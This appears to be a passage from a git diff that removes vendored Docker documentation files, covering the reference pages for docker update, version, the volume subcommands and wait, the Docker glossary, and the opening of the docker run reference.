-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-## update
-
-```markdown
-Usage:  docker update [OPTIONS] CONTAINER [CONTAINER...]
-
-Update configuration of one or more containers
-
-Options:
-      --blkio-weight value          Block IO (relative weight), between 10 and 1000
-      --cpu-period int              Limit CPU CFS (Completely Fair Scheduler) period
-      --cpu-quota int               Limit CPU CFS (Completely Fair Scheduler) quota
-  -c, --cpu-shares int              CPU shares (relative weight)
-      --cpu-rt-period int           Limit the CPU real-time period in microseconds
-      --cpu-rt-runtime int          Limit the CPU real-time runtime in microseconds
-      --cpuset-cpus string          CPUs in which to allow execution (0-3, 0,1)
-      --cpuset-mems string          MEMs in which to allow execution (0-3, 0,1)
-      --help                        Print usage
-      --kernel-memory string        Kernel memory limit
-  -m, --memory string               Memory limit
-      --memory-reservation string   Memory soft limit
-      --memory-swap string          Swap limit equal to memory plus swap: '-1' to enable unlimited swap
-      --restart string              Restart policy to apply when a container exits
-```
-
-The `docker update` command dynamically updates container configuration.
-You can use this command to prevent containers from consuming too many
-resources from their Docker host.  With a single command, you can place
-limits on a single container or on many. To specify more than one container,
-provide space-separated list of container names or IDs.
-
-With the exception of the `--kernel-memory` option, you can specify these
-options on a running or a stopped container. On kernel version older than
-4.6, you can only update `--kernel-memory` on a stopped container or on
-a running container with kernel memory initialized.
-
-## Examples
-
-The following sections illustrate ways to use this command.
-
-### Update a container's cpu-shares
-
-To limit a container's cpu-shares to 512, first identify the container
-name or ID. You can use `docker ps` to find these values. You can also
-use the ID returned from the `docker run` command.  Then, do the following:
-
-```bash
-$ docker update --cpu-shares 512 abebf7571666
-```
-
-### Update a container with cpu-shares and memory
-
-To update multiple resource configurations for multiple containers:
-
-```bash
-$ docker update --cpu-shares 512 -m 300M abebf7571666 hopeful_morse
-```
-
-### Update a container's kernel memory constraints
-
-You can update a container's kernel memory limit using the `--kernel-memory`
-option. On kernel version older than 4.6, this option can be updated on a
-running container only if the container was started with `--kernel-memory`.
-If the container was started *without* `--kernel-memory` you need to stop
-the container before updating kernel memory.
-
-For example, if you started a container with this command:
-
-```bash
-$ docker run -dit --name test --kernel-memory 50M ubuntu bash
-```
-
-You can update kernel memory while the container is running:
-
-```bash
-$ docker update --kernel-memory 80M test
-```
-
-If you started a container *without* kernel memory initialized:
-
-```bash
-$ docker run -dit --name test2 --memory 300M ubuntu bash
-```
-
-Update kernel memory of running container `test2` will fail. You need to stop
-the container before updating the `--kernel-memory` setting. The next time you
-start it, the container uses the new value.
-
-Kernel version newer than (include) 4.6 does not have this limitation, you
-can use `--kernel-memory` the same way as other options.
-
-### Update a container's restart policy
-
-You can change a container's restart policy on a running container. The new
-restart policy takes effect instantly after you run `docker update` on a
-container.
-
-To update restart policy for one or more containers:
-
-```bash
-$ docker update --restart=on-failure:3 abebf7571666 hopeful_morse
-```
-
-Note that if the container is started with "--rm" flag, you cannot update the restart
-policy for it. The `AutoRemove` and `RestartPolicy` are mutually exclusive for the
-container.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/version.md b/vendor/github.com/docker/docker/docs/reference/commandline/version.md
deleted file mode 100644
index cb1bcee5b3..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/version.md
+++ /dev/null
@@ -1,67 +0,0 @@
----
-title: "version"
-description: "The version command description and usage"
-keywords: "version, architecture, api"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# version
-
-```markdown
-Usage:  docker version [OPTIONS]
-
-Show the Docker version information
-
-Options:
-  -f, --format string   Format the output using the given Go template
-      --help            Print usage
-```
-
-By default, this will render all version information in an easy to read
-layout. If a format is specified, the given template will be executed instead.
-
-Go's [text/template](http://golang.org/pkg/text/template/) package
-describes all the details of the format.
-
-## Examples
-
-**Default output:**
-
-    $ docker version
-	Client:
-	 Version:      1.8.0
-	 API version:  1.20
-	 Go version:   go1.4.2
-	 Git commit:   f5bae0a
-	 Built:        Tue Jun 23 17:56:00 UTC 2015
-	 OS/Arch:      linux/amd64
-
-	Server:
-	 Version:      1.8.0
-	 API version:  1.20
-	 Go version:   go1.4.2
-	 Git commit:   f5bae0a
-	 Built:        Tue Jun 23 17:56:00 UTC 2015
-	 OS/Arch:      linux/amd64
-
-**Get server version:**
-
-    {% raw %}
-    $ docker version --format '{{.Server.Version}}'
-	1.8.0
-    {% endraw %}
-
-**Dump raw data:**
-
-    {% raw %}
-    $ docker version --format '{{json .}}'
-    {"Client":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"},"ServerOK":true,"Server":{"Version":"1.8.0","ApiVersion":"1.20","GitCommit":"f5bae0a","GoVersion":"go1.4.2","Os":"linux","Arch":"amd64","KernelVersion":"3.13.2-gentoo","BuildTime":"Tue Jun 23 17:56:00 UTC 2015"}}
-    {% endraw %}
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md
deleted file mode 100644
index 9b188a9500..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md
+++ /dev/null
@@ -1,91 +0,0 @@
----
-title: "volume create"
-description: "The volume create command description and usage"
-keywords: "volume, create"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# volume create
-
-```markdown
-Usage:  docker volume create [OPTIONS] [VOLUME]
-
-Create a volume
-
-Options:
-  -d, --driver string   Specify volume driver name (default "local")
-      --help            Print usage
-      --label value     Set metadata for a volume (default [])
-  -o, --opt value       Set driver specific options (default map[])
-```
-
-Creates a new volume that containers can consume and store data in. If a name is not specified, Docker generates a random name. You create a volume and then configure the container to use it, for example:
-
-```bash
-$ docker volume create hello
-hello
-
-$ docker run -d -v hello:/world busybox ls /world
-```
-
-The mount is created inside the container's `/world` directory. Docker does not support relative paths for mount points inside the container.
-
-Multiple containers can use the same volume in the same time period. This is useful if two containers need access to shared data. For example, if one container writes and the other reads the data.
-
-Volume names must be unique among drivers.  This means you cannot use the same volume name with two different drivers.  If you attempt this `docker` returns an error:
-
-```
-A volume named  "hello"  already exists with the "some-other" driver. Choose a different volume name.
-```
-
-If you specify a volume name already in use on the current driver, Docker assumes you want to re-use the existing volume and does not return an error.   
-
-## Driver specific options
-
-Some volume drivers may take options to customize the volume creation. Use the `-o` or `--opt` flags to pass driver options:
-
-```bash
-$ docker volume create --driver fake --opt tardis=blue --opt timey=wimey
-```
-
-These options are passed directly to the volume driver. Options for
-different volume drivers may do different things (or nothing at all).
-
-The built-in `local` driver on Windows does not support any options.
-
-The built-in `local` driver on Linux accepts options similar to the linux `mount` command. You can provide multiple options by passing the `--opt` flag multiple times. Some `mount` options (such as the `o` option) can take a comma-separated list of options. Complete list of available mount options can be found [here](http://man7.org/linux/man-pages/man8/mount.8.html).
-
-For example, the following creates a `tmpfs` volume called `foo` with a size of 100 megabyte and `uid` of 1000.
-
-```bash
-$ docker volume create --driver local --opt type=tmpfs --opt device=tmpfs --opt o=size=100m,uid=1000 foo
-```
-
-Another example that uses `btrfs`:
-
-```bash
-$ docker volume create --driver local --opt type=btrfs --opt device=/dev/sda2 foo
-```
-
-Another example that uses `nfs` to mount the `/path/to/dir` in `rw` mode from `192.168.1.1`:
-
-```bash
-$ docker volume create --driver local --opt type=nfs --opt o=addr=192.168.1.1,rw --opt device=:/path/to/dir foo
-```
-
-
-## Related information
-
-* [volume inspect](volume_inspect.md)
-* [volume ls](volume_ls.md)
-* [volume rm](volume_rm.md)
-* [volume prune](volume_prune.md)
-* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md
deleted file mode 100644
index 98e0ee5abf..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md
+++ /dev/null
@@ -1,59 +0,0 @@
----
-title: "volume inspect"
-description: "The volume inspect command description and usage"
-keywords: "volume, inspect"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# volume inspect
-
-```markdown
-Usage:  docker volume inspect [OPTIONS] VOLUME [VOLUME...]
-
-Display detailed information on one or more volumes
-
-Options:
-  -f, --format string   Format the output using the given Go template
-      --help            Print usage
-```
-
-Returns information about a volume. By default, this command renders all results
-in a JSON array. You can specify an alternate format to execute a
-given template for each result. Go's
-[text/template](http://golang.org/pkg/text/template/) package describes all the
-details of the format.
-
-Example output:
-
-    $ docker volume create
-    85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d
-    $ docker volume inspect 85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d
-    [
-      {
-          "Name": "85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d",
-          "Driver": "local",
-          "Mountpoint": "/var/lib/docker/volumes/85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d/_data",
-          "Status": null
-      }
-    ]
-
-    {% raw %}
-    $ docker volume inspect --format '{{ .Mountpoint }}' 85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d
-    /var/lib/docker/volumes/85bffb0677236974f93955d8ecc4df55ef5070117b0e53333cc1b443777be24d/_data
-    {% endraw %}
-
-## Related information
-
-* [volume create](volume_create.md)
-* [volume ls](volume_ls.md)
-* [volume rm](volume_rm.md)
-* [volume prune](volume_prune.md)
-* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md
deleted file mode 100644
index 90ecef2abe..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md
+++ /dev/null
@@ -1,183 +0,0 @@
----
-title: "volume ls"
-description: "The volume ls command description and usage"
-keywords: "volume, list"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# volume ls
-
-```markdown
-Usage:  docker volume ls [OPTIONS]
-
-List volumes
-
-Aliases:
-  ls, list
-
-Options:
-  -f, --filter value   Provide filter values (e.g. 'dangling=true') (default [])
-                       - dangling=<boolean> a volume if referenced or not
-                       - driver=<string> a volume's driver name
-                       - label=<key> or label=<key>=<value>
-                       - name=<string> a volume's name
-      --format string  Pretty-print volumes using a Go template
-      --help           Print usage
-  -q, --quiet          Only display volume names
-```
-
-List all the volumes Docker knows about. You can filter using the `-f` or `--filter` flag. Refer to the [filtering](#filtering) section for more information about available filter options.
-
-Example output:
-
-```bash
-$ docker volume create rosemary
-rosemary
-$docker volume create tyler
-tyler
-$ docker volume ls
-DRIVER              VOLUME NAME
-local               rosemary
-local               tyler
-```
-
-## Filtering
-
-The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more
-than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`)
-
-The currently supported filters are:
-
-* dangling (boolean - true or false, 0 or 1)
-* driver (a volume driver's name)
-* label (`label=<key>` or `label=<key>=<value>`)
-* name (a volume's name)
-
-### dangling
-
-The `dangling` filter matches on all volumes not referenced by any containers
-
-```bash
-$ docker run -d  -v tyler:/tmpwork  busybox
-
-f86a7dd02898067079c99ceacd810149060a70528eff3754d0b0f1a93bd0af18
-$ docker volume ls -f dangling=true
-DRIVER              VOLUME NAME
-local               rosemary
-```
-
-### driver
-
-The `driver` filter matches on all or part of a volume's driver name.
-
-The following filter matches all volumes with a driver name containing the `local` string.
-
-```bash
-$ docker volume ls -f driver=local
-
-DRIVER              VOLUME NAME
-local               rosemary
-local               tyler
-```
-
-#### Label
-
-The `label` filter matches volumes based on the presence of a `label` alone or
-a `label` and a value.
-
-First, let's create some volumes to illustrate this;
-
-```bash
-$ docker volume create the-doctor --label is-timelord=yes
-the-doctor
-$ docker volume create daleks --label is-timelord=no
-daleks
-```
-
-The following example filter matches volumes with the `is-timelord` label
-regardless of its value.
-
-```bash
-$ docker volume ls --filter label=is-timelord
-
-DRIVER              VOLUME NAME
-local               daleks
-local               the-doctor
-```
-
-As can be seen in the above example, both volumes with `is-timelord=yes`, and
-`is-timelord=no` are returned.
-
-Filtering on both `key` *and* `value` of the label, produces the expected result:
-
-```bash
-$ docker volume ls --filter label=is-timelord=yes
-
-DRIVER              VOLUME NAME
-local               the-doctor
-```
-
-Specifying multiple label filter produces an "and" search; all conditions
-should be met;
-
-```bash
-$ docker volume ls --filter label=is-timelord=yes --filter label=is-timelord=no
-
-DRIVER              VOLUME NAME
-```
-
-### name
-
-The `name` filter matches on all or part of a volume's name.
-
-The following filter matches all volumes with a name containing the `rose` string.
-
-    $ docker volume ls -f name=rose
-    DRIVER              VOLUME NAME
-    local               rosemary
-
-## Formatting
-
-The formatting options (`--format`) pretty-prints volumes output
-using a Go template.
-
-Valid placeholders for the Go template are listed below:
-
-Placeholder   | Description
---------------|------------------------------------------------------------------------------------------
-`.Name`       | Network name
-`.Driver`     | Network driver
-`.Scope`      | Network scope (local, global)
-`.Mountpoint` | Whether the network is internal or not.
-`.Labels`     | All labels assigned to the volume.
-`.Label`      | Value of a specific label for this volume. For example `{{.Label "project.version"}}`
-
-When using the `--format` option, the `volume ls` command will either
-output the data exactly as the template declares or, when using the
-`table` directive, includes column headers as well.
-
-The following example uses a template without headers and outputs the
-`Name` and `Driver` entries separated by a colon for all volumes:
-
-```bash
-$ docker volume ls --format "{{.Name}}: {{.Driver}}"
-vol1: local
-vol2: local
-vol3: local
-```
-
-## Related information
-
-* [volume create](volume_create.md)
-* [volume inspect](volume_inspect.md)
-* [volume rm](volume_rm.md)
-* [volume prune](volume_prune.md)
-* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md
deleted file mode 100644
index d910a49cdc..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md
+++ /dev/null
@@ -1,54 +0,0 @@
----
-title: "volume prune"
-description: "Remove unused volumes"
-keywords: "volume, prune, delete"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# volume prune
-
-```markdown
-Usage:	docker volume prune [OPTIONS]
-
-Remove all unused volumes
-
-Options:
-  -f, --force   Do not prompt for confirmation
-      --help    Print usage
-```
-
-Remove all unused volumes. Unused volumes are those which are not referenced by any containers
-
-Example output:
-
-```bash
-$ docker volume prune
-WARNING! This will remove all volumes not used by at least one container.
-Are you sure you want to continue? [y/N] y
-Deleted Volumes:
-07c7bdf3e34ab76d921894c2b834f073721fccfbbcba792aa7648e3a7a664c2e
-my-named-vol
-
-Total reclaimed space: 36 B
-```
-
-## Related information
-
-* [volume create](volume_create.md)
-* [volume ls](volume_ls.md)
-* [volume inspect](volume_inspect.md)
-* [volume rm](volume_rm.md)
-* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/)
-* [system df](system_df.md)
-* [container prune](container_prune.md)
-* [image prune](image_prune.md)
-* [network prune](network_prune.md)
-* [system prune](system_prune.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md
deleted file mode 100644
index 1bf9dba220..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md
+++ /dev/null
@@ -1,42 +0,0 @@
----
-title: "volume rm"
-description: "the volume rm command description and usage"
-keywords: "volume, rm"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# volume rm
-
-```markdown
-Usage:  docker volume rm [OPTIONS] VOLUME [VOLUME...]
-
-Remove one or more volumes
-
-Aliases:
-  rm, remove
-
-Options:
-  -f, --force  Force the removal of one or more volumes
-      --help   Print usage
-```
-
-Remove one or more volumes. You cannot remove a volume that is in use by a container.
-
-    $ docker volume rm hello
-    hello
-
-## Related information
-
-* [volume create](volume_create.md)
-* [volume inspect](volume_inspect.md)
-* [volume ls](volume_ls.md)
-* [volume prune](volume_prune.md)
-* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/wait.md b/vendor/github.com/docker/docker/docs/reference/commandline/wait.md
deleted file mode 100644
index a07b82b071..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/wait.md
+++ /dev/null
@@ -1,25 +0,0 @@
----
-title: "wait"
-description: "The wait command description and usage"
-keywords: "container, stop, wait"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# wait
-
-```markdown
-Usage:  docker wait CONTAINER [CONTAINER...]
-
-Block until one or more containers stop, then print their exit codes
-
-Options:
-      --help   Print usage
-```
diff --git a/vendor/github.com/docker/docker/docs/reference/glossary.md b/vendor/github.com/docker/docker/docs/reference/glossary.md
deleted file mode 100644
index 0bc39a2023..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/glossary.md
+++ /dev/null
@@ -1,286 +0,0 @@
----
-title: "Docker Glossary"
-description: "Glossary of terms used around Docker"
-keywords: "glossary, docker, terms, definitions"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# Glossary
-
-A list of terms used around the Docker project.
-
-## aufs
-
-aufs (advanced multi layered unification filesystem) is a Linux [filesystem](#filesystem) that
-Docker supports as a storage backend. It implements the
-[union mount](http://en.wikipedia.org/wiki/Union_mount) for Linux file systems.
-
-## base image
-
-An image that has no parent is a **base image**.
-
-## boot2docker
-
-[boot2docker](http://boot2docker.io/) is a lightweight Linux distribution made
-specifically to run Docker containers. The boot2docker management tool for Mac and Windows was deprecated and replaced by [`docker-machine`](#machine) which you can install with the Docker Toolbox.
-
-## btrfs
-
-btrfs (B-tree file system) is a Linux [filesystem](#filesystem) that Docker
-supports as a storage backend. It is a [copy-on-write](http://en.wikipedia.org/wiki/Copy-on-write)
-filesystem.
-
-## build
-
-build is the process of building Docker images using a [Dockerfile](#dockerfile).
-The build uses a Dockerfile and a "context". The context is the set of files in the
-directory in which the image is built.
-
-## cgroups
-
-cgroups is a Linux kernel feature that limits, accounts for, and isolates
-the resource usage (CPU, memory, disk I/O, network, etc.) of a collection
-of processes. Docker relies on cgroups to control and isolate resource limits.
-
-*Also known as : control groups*
-
-## Compose
-
-[Compose](https://github.com/docker/compose) is a tool for defining and
-running complex applications with Docker. With compose, you define a
-multi-container application in a single file, then spin your
-application up in a single command which does everything that needs to
-be done to get it running.
-
-*Also known as : docker-compose, fig*
-
-## container
-
-A container is a runtime instance of a [docker image](#image).
-
-A Docker container consists of
-
-- A Docker image
-- Execution environment
-- A standard set of instructions
-
-The concept is borrowed from Shipping Containers, which define a standard to ship
-goods globally. Docker defines a standard to ship software.
-
-## data volume
-
-A data volume is a specially-designated directory within one or more containers
-that bypasses the Union File System. Data volumes are designed to persist data,
-independent of the container's life cycle. Docker therefore never automatically
-delete volumes when you remove a container, nor will it "garbage collect"
-volumes that are no longer referenced by a container.
-
-
-## Docker
-
-The term Docker can refer to
-
-- The Docker project as a whole, which is a platform for developers and sysadmins to
-develop, ship, and run applications
-- The docker daemon process running on the host which manages images and containers
-
-
-## Docker Hub
-
-The [Docker Hub](https://hub.docker.com/) is a centralized resource for working with
-Docker and its components. It provides the following services:
-
-- Docker image hosting
-- User authentication
-- Automated image builds and work-flow tools such as build triggers and web hooks
-- Integration with GitHub and Bitbucket
-
-
-## Dockerfile
-
-A Dockerfile is a text document that contains all the commands you would
-normally execute manually in order to build a Docker image. Docker can
-build images automatically by reading the instructions from a Dockerfile.
-
-## filesystem
-
-A file system is the method an operating system uses to name files
-and assign them locations for efficient storage and retrieval.
-
-Examples :
-
-- Linux : ext4, aufs, btrfs, zfs
-- Windows : NTFS
-- macOS : HFS+
-
-## image
-
-Docker images are the basis of [containers](#container). An Image is an
-ordered collection of root filesystem changes and the corresponding
-execution parameters for use within a container runtime. An image typically
-contains a union of layered filesystems stacked on top of each other. An image
-does not have state and it never changes.
-
-## libcontainer
-
-libcontainer provides a native Go implementation for creating containers with
-namespaces, cgroups, capabilities, and filesystem access controls. It allows
-you to manage the lifecycle of the container performing additional operations
-after the container is created.
-
-## libnetwork
-
-libnetwork provides a native Go implementation for creating and managing container
-network namespaces and other network resources. It manage the networking lifecycle
-of the container performing additional operations after the container is created.
-
-## link
-
-links provide a legacy interface to connect Docker containers running on the
-same host to each other without exposing the hosts' network ports. Use the
-Docker networks feature instead.
-
-## Machine
-
-[Machine](https://github.com/docker/machine) is a Docker tool which
-makes it really easy to create Docker hosts on  your computer, on
-cloud providers and inside your own data center. It creates servers,
-installs Docker on them, then configures the Docker client to talk to them.
-
-*Also known as : docker-machine*
-
-## node
-
-A [node](https://docs.docker.com/engine/swarm/how-swarm-mode-works/nodes/) is a physical or virtual
-machine running an instance of the Docker Engine in swarm mode.
-
-**Manager nodes** perform swarm management and orchestration duties. By default
-manager nodes are also worker nodes.
-
-**Worker nodes** execute tasks.
-
-## overlay network driver
-
-Overlay network driver provides out of the box multi-host network connectivity
-for docker containers in a cluster.
-
-## overlay storage driver
-
-OverlayFS is a [filesystem](#filesystem) service for Linux which implements a
-[union mount](http://en.wikipedia.org/wiki/Union_mount) for other file systems.
-It is supported by the Docker daemon as a storage driver.
-
-## registry
-
-A Registry is a hosted service containing [repositories](#repository) of [images](#image)
-which responds to the Registry API.
-
-The default registry can be accessed using a browser at [Docker Hub](#docker-hub)
-or using the `docker search` command.
-
-## repository
-
-A repository is a set of Docker images. A repository can be shared by pushing it
-to a [registry](#registry) server. The different images in the repository can be
-labeled using [tags](#tag).
-
-Here is an example of the shared [nginx repository](https://hub.docker.com/_/nginx/)
-and its [tags](https://hub.docker.com/r/library/nginx/tags/)
-
-
-## service
-
-A [service](https://docs.docker.com/engine/swarm/how-swarm-mode-works/services/) is the definition of how
-you want to run your application containers in a swarm. At the most basic level
-a service  defines which container image to run in the swarm and which commands
-to run in the container. For orchestration purposes, the service defines the
-"desired state", meaning how many containers to run as tasks and constraints for
-deploying the containers.
-
-Frequently a service is a microservice within the context of some larger
-application. Examples of services might include an HTTP server, a database, or
-any other type of executable program that you wish to run in a distributed
-environment.
-
-## service discovery
-
-Swarm mode [service discovery](https://docs.docker.com/engine/swarm/networking/#use-swarm-mode-service-discovery) is a DNS component
-internal to the swarm that automatically assigns each service on an overlay
-network in the swarm a VIP and DNS entry. Containers on the network share DNS
-mappings for the service via gossip so any container on the network can access
-the service via its service name.
-
-You don’t need to expose service-specific ports to make the service available to
-other services on the same overlay network. The swarm’s internal load balancer
-automatically distributes requests to the service VIP among the active tasks.
-
-## swarm
-
-A [swarm](https://docs.docker.com/engine/swarm/) is a cluster of one or more Docker Engines running in [swarm mode](#swarm-mode).
-
-## Docker Swarm
-
-Do not confuse [Docker Swarm](https://github.com/docker/swarm) with the [swarm mode](#swarm-mode) features in Docker Engine.
-
-Docker Swarm is the name of a standalone native clustering tool for Docker.
-Docker Swarm pools together several Docker hosts and exposes them as a single
-virtual Docker host. It serves the standard Docker API, so any tool that already
-works with Docker can now transparently scale up to multiple hosts.
-
-*Also known as : docker-swarm*
-
-## swarm mode
-
-[Swarm mode](https://docs.docker.com/engine/swarm/) refers to cluster management and orchestration
-features embedded in Docker Engine. When you initialize a new swarm (cluster) or
-join nodes to a swarm, the Docker Engine runs in swarm mode.
-
-## tag
-
-A tag is a label applied to a Docker image in a [repository](#repository).
-tags are how various images in a repository are distinguished from each other.
-
-*Note : This label is not related to the key=value labels set for docker daemon*
-
-## task
-
-A [task](https://docs.docker.com/engine/swarm/how-swarm-mode-works/services/#/tasks-and-scheduling) is the
-atomic unit of scheduling within a swarm. A task carries a Docker container and
-the commands to run inside the container. Manager nodes assign tasks to worker
-nodes according to the number of replicas set in the service scale.
-
-The diagram below illustrates the relationship of services to tasks and
-containers.
-
-![services diagram](https://docs.docker.com/engine/swarm/images/services-diagram.png)
-
-## Toolbox
-
-Docker Toolbox is the installer for Mac and Windows users.
-
-
-## Union file system
-
-Union file systems, or UnionFS, are file systems that operate by creating layers, making them
-very lightweight and fast. Docker uses union file systems to provide the building
-blocks for containers.
-
-
-## virtual machine
-
-A virtual machine is a program that emulates a complete computer and imitates dedicated hardware.
-It shares physical hardware resources with other users but isolates the operating system. The
-end user has the same experience on a Virtual Machine as they would have on dedicated hardware.
-
-Compared to containers, a virtual machine is heavier to run, provides more isolation,
-gets its own set of resources and does minimal sharing.
-
-*Also known as : VM*
diff --git a/vendor/github.com/docker/docker/docs/reference/index.md b/vendor/github.com/docker/docker/docs/reference/index.md
deleted file mode 100644
index f24c342dfc..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/index.md
+++ /dev/null
@@ -1,21 +0,0 @@
----
-title: "Engine reference"
-description: "Docker Engine reference"
-keywords: "Engine"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# Engine reference
-
-* [Dockerfile reference](builder.md)
-* [Docker run reference](run.md)
-* [Command line reference](commandline/index.md)
-* [API Reference](https://docs.docker.com/engine/api/)
diff --git a/vendor/github.com/docker/docker/docs/reference/run.md b/vendor/github.com/docker/docker/docs/reference/run.md
deleted file mode 100644
index 73769ed610..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/run.md
+++ /dev/null
@@ -1,1555 +0,0 @@
----
-title: "Docker run reference"
-description: "Configure containers at runtime"
-keywords: "docker, run, configure, runtime"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# Docker run reference
-
-Docker runs processes in isolated containers. A container is a process
-which runs on a host. The host may be local or remote. When an operator
-executes `docker run`, the container process that runs is isolated in
-that it has its own file system, its own networking, and its own
-isolated process tree separate from the host.
-
-This page details how to use the `docker run` command to define the
-container's resources at runtime.
-
-## General form
-
-The basic `docker run` command takes this form:
-
-    $ docker run [OPTIONS] IMAGE[:TAG|@DIGEST] [COMMAND] [ARG...]
-
-The `docker run` command must specify an [*IMAGE*](glossary.md#image)
-to derive the container from. An image developer can define image
-defaults related to:
-
- * detached or foreground running
- * container identification
- * network settings
- * runtime constraints on CPU and memory
-
-With the `docker run [OPTIONS]` an operator can add to or override the
-image defaults set by a developer. And, additionally, operators can
-override nearly all the defaults set by the Docker runtime itself. The
-operator's ability to override image and Docker runtime defaults is why
-[*run*](commandline/run.md) has more options than any
-other `docker` command.
-
-To learn how to interpret the types of `[OPTIONS]`, see [*Option
-types*](commandline/cli.md#option-types).
-
-> **Note**: Depending on your Docker system configuration, you may be
-> required to preface the `docker run` command with `sudo`. To avoid
-> having to use `sudo` with the `docker` command, your system
-> administrator can create a Unix group called `docker` and add users to
-> it. For more information about this configuration, refer to the Docker
-> installation documentation for your operating system.
-
-
-## Operator exclusive options
-
-Only the operator (the person executing `docker run`) can set the
-following options.
-
- - [Detached vs foreground](#detached-vs-foreground)
-     - [Detached (-d)](#detached--d)
-     - [Foreground](#foreground)
- - [Container identification](#container-identification)
-     - [Name (--name)](#name---name)
-     - [PID equivalent](#pid-equivalent)
- - [IPC settings (--ipc)](#ipc-settings---ipc)
- - [Network settings](#network-settings)
- - [Restart policies (--restart)](#restart-policies---restart)
- - [Clean up (--rm)](#clean-up---rm)
- - [Runtime constraints on resources](#runtime-constraints-on-resources)
- - [Runtime privilege and Linux capabilities](#runtime-privilege-and-linux-capabilities)
-
-## Detached vs foreground
-
-When starting a Docker container, you must first decide if you want to
-run the container in the background in a "detached" mode or in the
-default foreground mode:
-
-    -d=false: Detached mode: Run container in the background, print new container id
-
-### Detached (-d)
-
-To start a container in detached mode, you use `-d=true` or just `-d` option. By
-design, containers started in detached mode exit when the root process used to
-run the container exits. A container in detached mode cannot be automatically
